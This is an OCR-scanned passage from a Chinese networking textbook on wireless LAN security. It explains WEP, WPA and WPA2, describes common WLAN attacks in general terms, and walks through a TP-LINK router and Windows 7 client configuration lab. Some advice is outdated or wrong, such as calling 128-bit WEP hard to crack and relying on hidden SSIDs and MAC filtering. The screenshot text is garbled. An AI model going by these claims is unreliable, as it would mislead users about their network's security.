WEP 在 数据 链 路 层 采用 RC4 对 称 加 密 技术 ,在 无 线 网 络 中 传输 的 数据 是 使 用 一 个 
随机 产生 的 密 钥 来 加 密 的 。 但 WEP 用 来 产生 这 些 密 钥 的 算法 很 快 就 被 发 现 具 有 可 预测 
性 ,对 于 入 侵 者 来 说 ,他 们 可 以 很 容易 地 截取 和 破解 这 些 密 钥 ,让 用 户 的 无 线 安全 防护 形 
同 虚设 。 

IEEE 802. 11 的 WEP 加密 模式 是 在 20 世纪 90 年 代 后 期 设计 的 ,当时 的 无 线 安全 防 
护 效 果 非 常 出 色 。 然 而 ,仅仅 两 年 以 后 ,在 2001 年 8 月 ,Fluhrer et al. 就 发 表 了 针对 WEP 
的 密码 分 析 ,利用 RC4 加 解密 和 IV(initialization vector, 初 始 向 量 ) 的 使 用 方式 的 特性 ,在 
无 线 网 络 上 偷 听 几 个 小 时 之 后 ,就 可 以 把 RC4 的 密 钥 破 解 出 来 。 这 个 攻击 方式 迅速 被 传 
播 , 而 且 自动 化 破解 工具 也 相继 推出 ,WEP 加 密 变 得 发 发 可 和 危 。 

2. WPA 和 WPA2 加 密 标准 

IEEE 802. 11i 定 义 了 无 线 局 域 网 核心 安全 标准 ,该 标准 提供 了 强大 的 加 密 、 认 证 和 
密 钥 管理 措施 。 该 标准 包括 了 两 个 增强 型 加 密 协 议 : WPA 和 WPA2, 用 于 对 WEP 中 的 
已 知 问题 进行 弥补 。 

WPA(WiFi protected access, Wi-Fi 网 络 安全 存 取 ) 是 Wi-Fi 联 盟 制订 的 安全 解决 方 
案 , 它 能 够 解决 已 知 的 WEP 脆弱 性 问题 ,并 且 能 够 对 已 知 的 无 线 局 域 网 攻击 提供 防护 。 
WPA 使 用 基于 RC4 算法 的 TKIP(temporal key integrity protocol, 临 时 密 钥 完整 性 协议 ) 
来 进行 加 密 , 并 且 使 用 WPA-PSK(WPA pre-shared key, WPA 预 共 享 密 钥 ) 和 IEEE 
802. 1x/EAP(extensible _ authentication protocol, 可 扩展 认证 协议 ) 来 进行 认证 。WPA- 
PSK 认证 是 通过 检查 无 线 客户 端 和 AP 是 否 拥 有 同一 个 密码 或 密码 短语 来 实现 的 ,如 果 客 
户 端的 密码 和 AP 的 密码 相同 .客户 端 就 会 得 到 认证 。 

WPA2 是 WPA 的 升级 版 ,已 不 支持 RC4 算法 的 TKIP, 但 支持 安全 性 更 高 的 AES 
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(advanced encryption standard ,高 级 加 密 标准 ) 和 CCMP(counter CBC-MAC protocol ,计数 
器 模式 密码 块 链 消息 完整 码 协 议 ) ,也 支持 WPA2-PSK 和 IEEE 802. 1x/EAP 的 认证 方式 。 

WPA 和 WPA2 都 有 两 种 工作 模式 ,以 满足 不 同类 型 的 市 场 需求 。 

(1) WPA-PSK(TKIP)/WPA2-PSK(AES) 个 人 模式 : 个 人 模式 可 以 通过 PSK 认证 无 
线 产 品 。 需 要 手动 将 预 共享 密 钥 配置 在 无 线 AP 和 无 线 客 户 端 上 ,无 须 使 用 认证 服务 器 。 
该 模式 适用 于 SOHO 环境 。 

(2) WPA/WPA2 企业 模式 : 企业 模式 可 以 通过 PSK 和 IEEE 802. 1x/EAP 认证 无 线 
产品 。 在 使 用 IEEE 802. 1x 模式 进行 认证 、 密 钥 管 理 和 集中 管理 用 户 证 书 时 ,需要 添加 使 
用 RADIUS 协议 的 AAA 服务 器 。 该 模式 适用 于 企业 环境 。 


11.3.7 无 线 局 域 网 常见 的 攻击 


由 于 无 线 局 域 网 采用 公共 的 电磁 波 作为 载体 ,电磁 波 能 够 穿 过 天 花 板 、 玻 璃 .楼 层 、 
砖 、 墙 等 物体 ,因此 在 一 个 无 线 AP 所 服务 的 区 域 中 ,任何 一 个 无 线 客户 端 都 可 以 接收 到 
此 无 线 AP 发 出 的 电磁 波 信号 ,这样 就 可 能 包括 一 些 恶意 用 户 也 能 接收 到 其 他 无 线 数据 
信和 号。 这 样 恶 意 用 户 在 无 线 局 域 网 中 相对 于 在 有 线 局 域 网 当中 去 穷 听 或 干扰 信息 就 容 
易 得 多 。 
WLAN 所 面临 的 安全 威胁 主要 有 以 下 几 类 。 

1. 网 络 窃听 

一 般 来 说 ,大 多 数 网 络 通信 都 是 以 明文 ( 非 加 密 ) 格 式 出 现 的 ,这 就 会 使 处 于 无 线 信 和 号 覆 
盖 范 围 之 内 的 攻击 者 可 以 乘机 监视 并 破解 ( 读 取 ) 通 信 。 这 类 攻击 是 网 络 管理 员 所 面临 的 最 
大 安全 问题 。 如 果 没 有 基于 加 密 的 强 有 力 的 安全 服务 ,数据 就 很 容易 在 空气 中 传输 时 被 他 
人 读 取 并 利用 。 

2. AP 中 间 人 欺骗 

在 没有 足够 的 安全 防范 措施 的 情况 下 ,WLAN 是 很 容易 受到 利用 非法 AP 进行 的 中 间 
人 欺骗 攻击 。 解 决 这 种 攻击 的 通常 做 法 是 采用 双向 认证 方法 ( 即 网 络 认证 用 户 , 同 时 用 户 也 
认证 网 络 ) 和 基于 应 用 层 的 加 密 认证 (如 HTTPS 十 Web)。 

3. WEP 破解 

现在 互联 网 上 存在 一 些 程序 ,能 够 捕捉 位 于 无 线 AP 信号 覆盖 区 域内 的 数据 包 , 收 集 到 
足够 的 WEP 弱 密 钥 加 密 的 数据 包 , 并 进行 分 析 以 破解 WEP 密 钥 。 根 据 监听 无 线 通信 的 机 
器 速度 .WLAN 内 发 射 信号 的 无 线 主机 数量 ,以 及 由 于 IEEE 802. 11 标准 帧 冲突 引起 的 IV 
重 发 数量 ,最 快 可 以 在 两 个 小 时 内 破解 WEP 密 钥 。 

4. MAC 地 址 欺骗 

即使 无 线 AP 使 用 了 MAC 地 址 过 滤 , 使 未 授权 的 黑客 的 无 线 网 卡 不 能 连接 无 线 AP， 
这 并 不 意味 着 能 够 阻止 黑客 进行 无 线 信 号 侦 听 。 通 过 某 些 软件 分 析 截 获 的 数据 ,能 够 获 
得 无 线 AP 允许 通信 的 客户 端的 MAC 地 址 ,这样 黑客 就 能 利用 MAC 地 址 伪装 等 手段 人 
侵 网 络 了 。 
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114 项 目 实 施 


任务 : 无 线 局 域 网 安全 配置 


1. 任务 目标 

(1) 熟悉 无 线路 由 器 的 安全 设置 方法 ,组建 以 无 线路 由 器 为 中 心 的 无 线 局 域 网 。 

(2) 熟悉 以 无 线路 由 器 为 中 心 的 无 线 网 络 客户 端的 安全 设置 方法 。 

(3) 了 解 无 线 加 密 标 准 。 

2. 任务 内 容 

(1) 安全 配置 无 线路 由 器 。 

(2) 安全 配置 PC1 计算 机 的 无 线 网 络 。 

(3) 安全 配置 PC2、PC3 计算 机 的 无 线 网 络 。 

(4) 网 络 连 通 性 测试 。 

3. 完成 任务 所 需 的 设备 和 软件 

(1) 安装 有 Windows 7 操作 系统 的 计算 机 3 台 。 

(2) 无 线 网 卡 3 块 (USB 接口 ,TP-LINK TL-WN821N)。 

(3) 无 线路 由 器 1 台 (TP-LINK TL-WR841N)。 

(4) 直通 网 线 2 根 。 

4. 任务 实施 步骤 

1) 安全 配置 无 线路 由 器 

步骤 1: 把 连接 外 网 (如 Internet) 的 直通 网 线 接 入 无 线路 由 器 的 WAN 端口 ,把 另 一 直 
通 网 线 的 一 端 接 入 无 线路 由 器 的 LAN 端口 , 另 一 端口 接 入 PC1 计算 机 的 有 线 网 卡 端口 ,如 


图 11-12 所 示 。 
PC2 PC3 
自动 获取 IP 自动 获取 IP 
(0) 
LAN 端 口 oS WAN 端 口 


无 线路 由 器 


11-12 ”Infrastructure 模式 无 线 局 域 网 拓扑 结构 
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步骤 2: 设置 PC1 计算 机 有 线 网 卡 的 IP 地 址 为 192. 168. 1. 10, 子 网 掩 码 为 255. 255. 
255. 0, 默 认 网 关 为 192. 168. 1. 1。 再 在 IE 地址 栏 中 输入 http://192. 168. 1.1, 打 开 无 线路 
由 器 登录 界面 ,输入 用 户 名 为 admin, 密 码 为 admin, 如 图 11-13 所 示 , 单 击 “ 确 定 ” 按 钮 后 进 
入 设置 界面 。 








Windows 安全 区 柯 
位 于 TP-UNK Wireless N Router WR841N 的 服务 器 192.168.1.1 要 求 
用 户 名 和 密码 . 


警告 ; 此 服务 器 要 求 以 不 安全 的 方式 发 送 您 的 用 户 名 和 密码 (没有 安全 连接 
的 基本 认证 )。 


(3) admin | 
本 7 
回 记 住 我 的 任 关 











Cn ]L |] 


图 11-13 无 线路 由 器 登录 界面 











说 明 在 默认 情况 下 ,无 线路 由 器 的 LAN 端口 地 址 一 般 为 192. 168. 1.1, 用 户 名 和 密 
码 均 为 admin, 可 查阅 无 线路 由 器 说 明 书 。 

步骤 3: 进入 设置 界面 以 后 ,选择 左 侧 向 导 菜 单 中 的 “网 络 参 数 "一 "LAN 口 设置 " 链 
接 后 ,在 右 侧 窗 格 中 可 设置 LAN 口 的 了 P 也 地址, 一般 默认 为 192. 168. 1. 1, 如 图 11-14 
所 示 。 











DG hep//192.16811/ 
















































本 页 设置 LN 品 的 基本 网络 参 雪 。 
AC 地 址 : 14-B6-E4-4E-C2-50 
王 地 址 : [EC 
子 阿 村 码 : 255.255.255.0 ~ 
区 可 区 
一， nD 6 











图 11-14 LAN 口 设 置 





步骤 4: 单 击 左 侧 向 导 菜 单 中 的 “网 络 参数 ”>“WAN 口 设置 ?链接 ,在 右 侧 窗 格 中 可 设 
置 WAN 口 的 连接 类 型 ,如 图 11-15 所 示 。 对 于 家 庭 用 户 ,一 般 是 通过 虚拟 拨号 方式 接 入 互 
联网 , 需 选 择 PPPoE 连接 类 型 ,再 输入 服务 商 提 供 的 上 网 账号 和 上 网 口令 (密码 ) 即 可 ;对 于 
通过 局 域 网 接 入 互联 网 的 用 户 , 需 选择 “动态 IP” 或 “静态 IP”( 需 设置 静态 IP 地 址 、 子 网 扼 
码 、 网 关 等 参数 ) 连 接 类 型 。 单 击 “ 保 存 ” 按 钮 。 
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,|@ hapy/1921684.1/ 


nhl 
® PD- BOX| Twren x 0 














TP-LINK 





300M 传 输 速 率 盖 与 现 无 线 自 由 连 


AN 连接 类 型: 
PPPoF 和 连接 

上 网 蛤 号 : 

上 网 口令 : 

确认 口令 : 
特殊 拨号 : 
第 二 连接 : 


FPPoE ~ 




















自动 选择 拔 号 模式 ~ 
加 禁用 
根据 您 的 需要 ， 请 选择 对 应 的 连接 模式 : 
加 按 需 连接 ， 在 有 访问 时 自 动 连 接 
自动 断 线 等 待 时 间 : 分 (0 表示 不 自动 断 线 ) 


PEST 让 下 如 3n8t 扬 斩 :人 二 地 


动态 I ”加 阐 态 








15 




















步骤 5: 单 击 左 侧 向 导 


图 11-15 WAN 口 设置 


菜单 中 的 “无 线 设置 ">“ 无 线 MAC 地 址 过 滤 ” 链 接 , 然 后 单 击 右 


侧 窗 格 中 的 “启用 过 滤 ” 按 钮 ,选中 “允许 ” 单 选 按 钮 ,再 通过 “添加 新 条 目 ” 按 钮 ,把 可 以 访问 


无 线 网 络 的 计算 机 (PC1、PC2、PC3) 的 无 线 网 卡 的 MAC 
不 在 列表 的 计算 机 则 不 能 访问 无 线 网 络 。 


了 地址 添加 到 列表 中 ,如 图 11-16 所 示 ， 








GE 





万 hapy/192.168.1.1 


BTLWRSAIN 








TP-LINNK 









素 


让 卖 现 无 线 自 由 连 梳 梦想 


无 13 络 WWC 地 址 过 适 设 置 


本 页 设置 WC 地 址 过 滤 来 控制 计算 机 对 本 无 线 阿 络 的 访问 。 







































































Mc 地 ij 天 功能 : 已 开启 [二] 
ER 
曲 茜 止 列表 中 生效 WAC 地 址 访问 本 无 线 P 络 
(中 生 划 yc 地 址 访问 本 无 后 络 
有 EE] 
i W 
了 
(Gm [条 上 到 所 有 条 目 天 观 所 有 和 也 
EE = [ 柄 而 
图 11-16 “无 线 MAC 地 址 过 滤 ” 的 设置 


说 明 运行 ipconfig/all 命令 可 查看 计算 机 的 无 线 网 卡 的 MAC 地址 。 
步骤 6: 单 击 左 侧 向 导 菜 单 中 的 “DHCP 服务 器 *>“DHCP 服务 ”链接 ,在 右 侧 窗 格 中 选中 
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“启用 ” 单 选 按钮 ,设置 地 址 池 的 开始 地 址 为 192. 168. 1. 100 ,结束 地 址 为 192. 168. 1. 199， 
网 关 地 址 为 192. 168. 1. 1。 还 可 设置 主 DNS 服务 器 和 备用 DNS 服务 器 的 IP 地 址 ,如 中 国 
电信 的 浙江 DNS 服务 器 为 60. 191. 134. 196 或 60. 191. 134. 206 ,如 图 11-17 所 示 。 单 击 “ 保 
存 ” 按 钮 。 











= .5 
GOE http://192.168.1.1 ~ 感 TLwRs41N x 四 | 人 i 太守 1 


TP-LINK SN :3 














二 牙 由 关内 建 89DWT 角 务 器 能 自动 可 于 局 二 网 中 各 计算 机 9TCP/T? 协 议 。 
Hz 最 务 器 : 不 启用 加 启用 

地 址 籽 开 始 地 址 : 。 [732-165-1-100 
地 址 池 结 这 地 址 : 。 [1752-15 TI9 ] 




















地 址 和 期: 120 | 分钟 (1~2880 分 钟 , 天 省 为 120 分 钟 ) 
网 关 : 511 一] (本 过) 
点 认 拭 各 : { 梧 选 ) 
主 DNS 服 务 器 : 80. 191. 134. 195 | ( 梧 选 ) 














备用 ms 服务 各: 。 [加 1597 134.206 ] 《本 选 ) 








保存 ] [ 需 助 
































图 11-17 “DHCP 服务 ”的 设置 


对 于 规模 不 大 的 网 络 或 为 了 进一步 提高 无 线 网 络 的 安全 性 ,可 以 考虑 使 用 静态 的 IP 地 
址 配置 ,关闭 无 线路 由 器 的 DHCP 服务 。 

步骤 7: 单 击 左 侧 向 导 菜 单 中 的 “无 线 参数 >“ 基本 设置 "链接 ,在 右 侧 窗 格 中 设置 无 线 
网 络 的 SSID 号 为 tzkjy、 信 道 为 “自动 ”模式 为 11bgn mixed, 选 中 “开启 无 线 功 能 ” 复 选 框 ， 
取消 选中 “开启 SSID 广播 " 复 选 框 ,如 图 11-18 所 示 。 单 击 “ 保 存 ” 按 钮 。 




















无 将 3 络 基 本 设置 


本 页 面 设置 路 由 器 无 线 网 络 的 基本 者 歼 。 





SSmDB: kjy 
信道 : 自动 ~ 
Tiben nized ~ 
自动 ~ 

















[ 医 司 [本 马 


























图 11-18 ”无线 网 络 的 基本 设置 
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不 广播 SSID, 是 为 了 证 无 线 网 络 覆盖 范围 内 的 用 户 都 不 能 看 到 该 网 络 的 SSID 值 , 从 而 


提高 无 线 网 络 的 安全 性 。 
步骤 8: 单 击 左 侧 向 


导 菜 单 中 的 “无 线 参数 ”>“ 无 线 安全 设置 "链接 ,在 右 侧 窗 格 中 选中 


“WPA-PSK/WPA2-PSK? 单 选 按钮 ,选择 认证 类 型 为 WPA2-PSK, 加 密 算法 为 AES, 并 输 


入 PSK 密码 为 abcdefgh 


,如 图 11-19 所 示 。 单 击 “ 保 存 ” 按 钮 。 














于， "> (= 

















92.168.11/ 起 PD-aox 





SOBren 


| 
















,< 300M 传 输 速 率 汪 实现 无 线 自 由 连 


rl 


无 姥 物 支 全 设置 


本 页 面 设置 路 由 器 无 线 F3 络 的 安全 认证 选项 。 
示 : 为 ， 强烈 推 荐 开启 安全 设置 ， 并 使 用 WTA 





D 





不 开户 无 线 去 全 


@ IPAN-FSIKVTPA-PSK 

认证 类 型 : IPA2-FSK ~ 

加 瑟 基 法: Ms ~ | 

Fs: ET 

《6-63 个 ASCII 码 字符 或 8-64 个 十 六 进 制 字 符 ) 

组 军 钼 更 新 周期 : 6400 
(单位 为 秒 ， 最 小 值 为 30， 不 更 新 风 为 0) 























IPA 
认证 类 型: 自动 ~ 
































在 “安全 设置 ”菜单 和 
高 网 络 的 安全 性 。 


图 11-19 无 线 安全 设置 


1 ,还 可 设置 是 否 启用 防火 墙 \IP 地 址 过 滤 ,域名 过 滤 等 ,进一步 提 


说 明 WEP 加 密 经 常 在 老 的 无 线 网 卡 上 使 用 ,新 的 802. 11n 标准 已 经 不 支持 WEP 加 


密 方 式 。 所 以 ,如 果 选 择 


了 WEP 加 密 方式 ,无 线路 由 器 可 能 工作 在 较 低 的 传输 速率 上 。 


另外 ,WEP 的 安全 性 有 限 , 且 目前 已 有 破解 方法 ,在 实际 使 用 中 不 宜 采 用 。 建 议 使 用 


WPA2-PSK 等 级 的 AES 
步骤 9: 因为 默认 的 


加 密 方式 。 
登录 用 户 名 (admin) 和 口令 (admin) 很 不 安全 ,可 单 击 左 侧 向 导 菜 


单 中 的 “系统 工具 ”>“ 修 改 登录 口令 "链接 ,在 右 侧 窗 格 中 修改 登录 用 户 名 和 口令 ,如 图 11-20 


所 示 。 单 击 “ 保 存 ” 按 钮 。 


本 页 修改 系统 管理 员 的 用 户 名 及 口令 ， 用 户 名 及 口令 长 度 不 能 超过 14 个 字 
节 。 
































原 用 户 名 : Fr 
原 口令 : Er 
新 用 户 名 : yadnin 
新 D 令 : ET 
确认 新 口令 : 区 

















保存 





EE 














图 11-20 修改 系统 管理 员 的 用 户 名 及 口令 
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步骤 10: 单 击 左 侧 向 导 菜单 中 的 “运行 状态 ”链接 ,可 查看 无 线路 由 器 的 当前 状态 (包括 
版 本 信息 、LAN 口 状 态 `WAN 口 状 态 .无 线 状 态 `WAN 口 流 量 统计 等 状态 信息 ), 如 图 11-21 


所 示 。 

















二 











[ee 


TP-LINK 





PD-acx 





回 - 多 hep//o21681Y 











当前 软件 版 本 : 《4.17. 12 Build 110705 Rel. 36821n 


当前 硬件 版 本 :。 fm4Lf 5.0 oo000000 
IN 口 所 态 

mc 地 址 : ‘20-44E-C2-50 

王 地 址 : 192.168.1.1 

子 网 捉 吗 : 255.255 255.0 





无 蜂 功 能: 有 用 
SSDS: zkjy 
信 道 : 自动 《当前 信道 5) 
: lben nixed 
敲 : 自动 
MC 地 址 : 14- 有 -到 -4E-C2-50 
Ds 拟态 : 未 开启 





MAC 地 址 14-E6-E4-4E-C2-51 

TP 地 址 : 10. 152.134. 237 PPPsE 按 需 连 接 

子 阿拉 255. 255 255.0 三 
网 关 : 10. 152.134.231 

DIS 服务 器 211.140 13.188 ，211. 140. 188. 188 

Lr: oa 00:0115 。 国 到 | 





Wi 
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图 11-21 无 线路 由 器 的 运行 状态 


步骤 11: 至 此 ,无 线路 由 器 的 设置 基本 完成 ,重新 启动 


未 连接 多 

路 由 器 ,使 以 上 设置 生效 。 然 后 拔除 PC1 计算 机 到 无 线路 ds 
由 器 之 间 的 直通 网 线 。 无 二 网 络 连 按 a 

2) 安全 配置 PC1 计算 机 的 无 线 网 络 Netcore | 

在 Windows 7 计算 机 中 ,能 够 自动 搜索 到 当前 可 用 的 [ay 邮 
无 线 网 络 ,通常 情况 下 , 单 击 Windows 7 右 下 角 的 无 线 连 接 ”| 回 旦 
图 标量 ,在 打开 的 无 线 网 络 列表 中 单 击 tzkjy 连接 ,展开 该 | 种 叫 
连接 ,然后 单 击 该 连接 下 的 “连接 ”按钮 ,如 图 11-22 所 示 , 再 |“™ 明 
按 要 求 输入 密 钥 就 可 以 了 。 但 对 于 隐藏 的 无 线 连接 可 采用 | 本 
如 下 设置 。 

步骤 1: 在 PC1 计算 机 上 安装 无 线 网 卡 和 相应 的 驱动 打开 网 络 和 共享 中 心 





程序 后 ,设置 该 无 线 网 卡 并 自动 获得 IP 地 址 。 
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图 11-22 无 线 网 络 列表 
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步骤 2: 单 击 Windows 7 桌面 右 下 角 的 无 线 连接 图 标量 ,在 打开 的 列表 中 单 击 “ 打 开 
网 络 和 共享 中 心 ”链接 ,打开 “网 络 和 共享 中 心 ”窗口 ,如 图 11-23 所 示 。 














图 11-23 “网 络 和 共享 中 心 ”窗口 


步骤 3: 单 击 “设置 新 的 连接 或 网 络 " 链 接 , 打 开 “ 设 置 连 接 或 网 络 ” 对 话 框 ,如 图 11-24 
所 示 , 选 择 “ 手 动 连接 到 无 线 网 络 ” 选 项 。 


选择 一 个 连接 选项 





连接 到 Internet 
设置 无 线 、 究 秆 或 挨 号 连接 , 连接 到 Internet. 


RE 设置 新 网 络 
配置 新 的 路 由 项 或 访问 点 


Bs 连接 到 工作 区 
设置 到 人 的 工作 区 的 拨号 或 VPN 连接 . 








急 使 用 拨号 连接 连接 到 Internet。 




















图 11-24 “设置 连接 或 网 络 ” 对 话 框 
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步骤 4: 单 击 “下 一 步 ?按钮 ,打开 * 手 动 连接 到 无 线 网 络 ? 对 话 框 , 如 图 11-25 所 示 , 设 置 
网 络 名 为 tzkjy, 安 全 类 型 为 “WPA2 - 个 人 ”, 加 密 类 型 为 AES ,安全 密 钥 为 abcdefgh, 选 中 
“自动 启动 此 连接 ”和 “即使 网 络 未 进行 广播 也 连接 " 复 选 框 。 

| 








图 11-25 “手动 连接 到 无 线 网 络 ?对 话 杠 


说 明 网 络 名 (SSID) 和 安全 密 钥 的 设置 必须 与 无 线路 由 器 中 的 设置 一 致 。 
步骤 5: 单 击 * 下 一 步 "按钮 ,出 现 * 成 功 地 添加 了 tzkjy” 界 面 ,如 图 11-26 所 示 。 








图 11-26 “成 功 地 添加 了 tzkjy” 界 面 


步骤 6: 单 击 “ 关 闭 ” 按 钮 ,等 一 会 儿 , 桌 面 任务 栏 上 的 无 线 网 络 连接 图 标 由 量变 为 J， 
表示 该 计算 机 已 接 入 无 线 网 络 。 
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如 果 在 图 11-26 中 单 击 * 更 改 连 接 设 置 "选项 ,会 打开 *tzkjy 无 线 网 络 属性 ”对 话 框 ,在 
“连接 ”和 “安全 ”选项 卡 中 可 查看 或 修改 有 关 参 数 , 如 图 11-27 所 示 。 






































| 二 
名 称 trkjy 
SSm takjy 安全 类 型 中) [个 人 一] 
网 络 类 型 访问 点 加 于 类 型 中 OT 
RR 户 FSF S888 | 
国 当 此 卫 络 在 范 转 内 时 自动 连接 中 加 固 旺 示 字符 00 





回 连 接 到 更 适合 的 网 络 各 果 可 用 ) F) 
国 即 使 由 络 未 广播 其 名 称 也 连接 SsTD) 0) 








加 接 此 网 络 配 轩 廊 件 章 向 | USB 闪存 驱动 骂 高 级 设置 0) | 
































[mm] [ml 








图 11-27 “tzkjy 无 线 网 络 属性 ”对 话 框 


3) 安全 配置 PC2、PC3 计算 机 的 无 线 网 络 

步骤 1: 在 PC2 计算 机 上 ,重复 上 述 步骤 1 一 步骤 6, 完成 PC2 计算 机 无 线 网 络 的 设置 。 

步骤 2: 在 PC3 计算 机 上 ,重复 上 述 步骤 1 一 步骤 6, 完 成 PC3 计算 机 无 线 网 络 的 设置 。 

4) 网 络 连通 性 测试 

步骤 1: 在 PC1、.PC2 和 PC3 计算 机 上 运行 ipconfig 命令 ,查看 并 记录 PC1、PC2 和 PC3 
计算 机 无 线 网 卡 的 IP 地 址 。 











PC1 计算 机 无 线 网 卡 的 IP 地 址 : o 
PC2 计算 机 无 线 网 卡 的 IP 地址 : 。 
PC3 计算 机 无 线 网 卡 的 IP 地 址 : 。 
步骤 2: 在 PC1 计算 机 上 ,依次 运行 “ping PC2 计算 机 无 线 网 卡 的 IP 地 址 ”和 “ping 


PC3 计算 机 无 线 网 卡 的 IP 地 址 ”命令 ,测试 与 PC2 和 PC3 计算 机 的 连通 性 。 

步骤 3: 在 PC2 计算 机 上 ,依次 运行 “ping PC1 计算 机 无 线 网 卡 的 IP 地 址 ”和 “ping 
PC3 计算 机 无 线 网 卡 的 IP 地 址 ”命令 ,测试 与 PCl 和 PC3 计算 机 的 连通 性 。 

步骤 4: 在 PC3 计算 机 上 ,依次 运行 “ping PC1 计算 机 无 线 网 卡 的 IP 地 址 ”和 “ping 
PC2 计算 机 无 线 网 卡 的 IP 地 址 ”命令 ,测试 与 PCl 和 PC2 计算 机 的 连通 性 。 


11.5 拓展 提升 : 无 线 局 域 网 的 安全 性 


当 用 户 对 WLAN 的 期 望 日 益 升 高 时 ,其 安全 问题 随 着 应 用 的 深入 表露 无 遗 , 并 成 为 制 
约 WLAN 发 展 的 主要 “ 瓶 须 ”。 
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1. 威胁 无 线 局 域 网 安全 的 因素 

首先 应 该 被 考虑 的 问题 是 ,由 于 WLAN 是 以 无 线 电 波 作为 传输 媒介 ,因此 无 线 网 络 存 
在 难以 限制 网 络 资源 的 物理 访问 ,无 线 网 络 信 号 可 以 传播 到 预期 的 方位 以 外 的 地 域 , 具 体 情 
况 要 根据 建筑 材料 和 环境 而 定 。 这 样 就 使 得 在 网 络 覆 盖 范 围 内 都 是 WLAN 的 接 入 点 ,给 
入 侵 者 有 机 可 乘 , 可 以 在 预期 范围 以 外 的 地 方 访问 WLAN ,窃听 网 络 中 的 数据 ,应 用 各 种 攻 
击 手段 对 无 线 网 络 进行 攻击 ,当然 这 是 在 入 侵 者 拥有 了 网 络 访问 权 之 后 。 

其 次 ,由 于 WLAN 还 是 符合 所 有 网 络 协议 的 计算 机 网 络 , 所 以 计算 机 病毒 一 类 的 网 络 
威胁 因素 同样 也 威胁 着 所 有 WLAN 内 的 计算 机 ,甚至 会 产生 比 普通 网 络 更 加 严重 的 后 果 。 

因此 ,WLAN 中 存在 的 安全 威胁 因素 主要 有 : 窃听 、 截 取 或 者 修改 传输 数据 .置信 攻 
击 .拒绝 服务 等 。 

IEEE 802. 1x 认证 协议 发 明 者 Vipin Jain 接受 媒体 采访 时 表示 :“ 谈 到 无 线 网 络 ,企业 
的 IT 经 理 人 最 担心 两 件 事 : 第 一 ,市面 上 的 标准 与 安全 解决 方案 太 多 ,使 得 用 户 无 所 适 从 ; 
第 二 ,如 何 避 免 网 络 遭 到 入 侵 或 攻击 ”无 线 媒 体 是 一 个 共享 的 媒介 ,不 会 受 限 于 建筑 物 实体 
界限 ,因此 有 人 要 入 侵 网 络 可 以 说 十 分 容易 .” 因 此 WLAN 的 安全 措施 还 是 任 重 而 道 远 。 

2. 无 线 局 域 网 的 安全 措施 

1) 采用 无 线 加 密 协议 防止 未 授权 用 户 访 问 

保护 无 线 网 络 安全 的 最 基本 手段 是 加 密 , 通 过 简单 设置 AP 和 无 线 网 卡 等 设备 ,就 可 以 
启用 WEP 加 密 。WEP 是 对 无 线 网 络 上 的 流量 进行 加 密 的 一 种 标准 方法 。 许 多 无 线 设备 
厂商 为 了 方便 安装 产品 ,交付 设备 时 关闭 了 WEP 功能 。 但 一 旦 采用 这 种 做 法 ,黑客 就 能 利 
用 无 线 嗅 探 器 直接 读 取 数据 。 建 议 经 常 对 WEP 密 钥 进行 更 换 , 在 条 件 允许 的 情况 下 启用 
独立 的 认证 服务 为 WEP 自动 分 配 密 钥 。 另 外 一 个 必须 注意 的 问题 就 是 用 于 标识 每 个 无 线 
网 络 的 服务 集 标识 (SSID) ,在 部 署 无 线 网 络 的 时 候 一 定 要 将 出 厂 时 的 默认 SSID 更 换 为 自 
定义 的 SSID。 现 在 的 大 部 分 AP 都 支持 屏蔽 SSID 广播 ,除非 有 特殊 理由 ,否则 应 该 禁用 
SSID 广播 ,这 样 可 以 减少 无 线 网 络 被 发 现 的 可 能 。 

但 是 目前 IEEE 802. 11 标准 中 的 WEP 安全 解决 方案 在 15 分 钟 内 就 可 被 攻破 ,已 被 广 
泛 证 实 不 安全 ,所 以 应 采用 支持 128 位 的 WEP, 破 解 128 位 的 WEP 是 相当 困难 的 。 同 时 也 
要 定期 更 改 WEP 密 钥 , 保 证 无 线 局 域 网 的 安全 。 如 果 设备 提供 了 动态 WEP 功能 ,最 好 应 
用 动态 WEP。 值 得 庆幸 的 是 ,Windows 7 本 身 就 提供 了 这 种 支持 ,可 以 选中 WEP 选项 * 自 
动 为 我 提供 这 个 密 钥 ”。 同 时 ,应 该 使 用 WPA/WPA2、IPSec、VPN、SSH 或 其 他 WEP 的 替 
代 方 法 ,不 要 仅 使 用 WEP 来 保护 数据 。 

2) 改变 服务 集 标 识 符 并 且 禁 止 SSID 广播 

SSID 是 无 线 接 人 的 身份 标识 符 ,用户 用 它 来 建立 与 接 人 点 之 间 的 连接 。 这 个 身份 标识 
符 是 由 通信 设备 制造 商 设 置 的 ,并 且 每 个 厂商 都 用 自己 的 默认 值 。 例 如 ,3COM 的 设备 都 
用 101。 因 此 ,知道 这 些 标识 符 的 黑客 可 以 很 容易 不 经 过 授权 就 可 享受 无 线 服 务 ,这 需要 给 
每 个 无 线 接 入 点 设置 一 个 唯一 并 且 难 以 推测 的 SSID。 如 果 可 能 ,还 应 该 禁止 SSID 向 外 广 
播 。 这 样 ,无线 网 络 就 不 能 够 通过 广播 的 方式 来 吸纳 更 多 用 户 。 当 然 这 并 不 是 说 网 络 不 可 
用 ,只 是 它 不 会 出 现在 可 使 用 网 络 的 名 单 中 。 

3) 静态 IP 地 址 与 MAC 地 址 绑 定 

无 线路 由 器 或 AP 在 分 配 IP 地 址 时 ,通常 是 默认 使 用 DHCP 服务 , 即 动态 分 配 IP 地 
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址 ,这 对 无 线 网 络 来 说 是 有 安全 隐患 的 。“ 不 法 ”分 子 只 要 找到 了 无 线 网 络 ,就 可 以 通过 
DHCP 而 得 到 一 个 合法 的 IP 地 址 ,由 此 就 进入 了 无 线 局 域 网 中 。 因 此 ,建议 关闭 DHCP 服 
务 , 为 每 台 计 算 机 分 配 固定 的 静态 IP 地 址 ,然后 再 把 这 个 IP 地 址 与 该 计算 机 网 卡 的 MAC 
地 址 进行 绑 定 ,这 样 就 大 大 提升 了 网 络 的 安全 性 .“ 不 法 ?分 子 不 易 得 到 合法 的 IP 地 址 , 即 
使 得 到 了 ,因为 还 要 验证 绑 定 的 MAC 地 址 ,相当 于 两 重 关卡 。 设 置 方法 是 首先 在 无 线路 由 
器 或 AP 的 设置 中 关闭 “DHCP 服务 ”, 然 后 激活 “固定 DHCP” 功 能 ,把 各 计算 机 的 名 称 ( 即 
Windows 系统 属性 里 的 “计算 机 描述 ”) ,将 以 后 要 固定 使 用 的 卫 地 址 ,网 卡 的 MAC 地 址 都 
如 实 填写 好 ,最 后 单 击 * 执 行 ?按钮 就 可 以 了 。 

4) VPN 技术 在 无 线 网 络 中 的 应 用 

